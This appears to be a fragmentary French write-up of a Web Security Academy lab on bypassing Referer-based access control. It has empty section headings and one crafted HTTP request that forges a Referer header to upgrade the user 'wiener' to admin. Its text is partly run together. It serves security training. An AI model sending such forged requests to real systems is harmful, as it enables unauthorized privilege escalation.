Contrôle d’accès basé sur l’en-tête Referer
Referer-based access control
1. Contexte

2. Contournement du contrôle Referer

Mis à jour


Mis à jour
cIA2AyZn2GhizvLK7VR8SUCMcdezZcFlGET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a19008c034b40de834b14e0009a0062.web-security-academy.net
Cookie: session=cIA2AyZn2GhizvLK7VR8SUCMcdezZcFlReferer: https://0a19008c034b40de834b14e0009a0062.web-security-academy.net/admin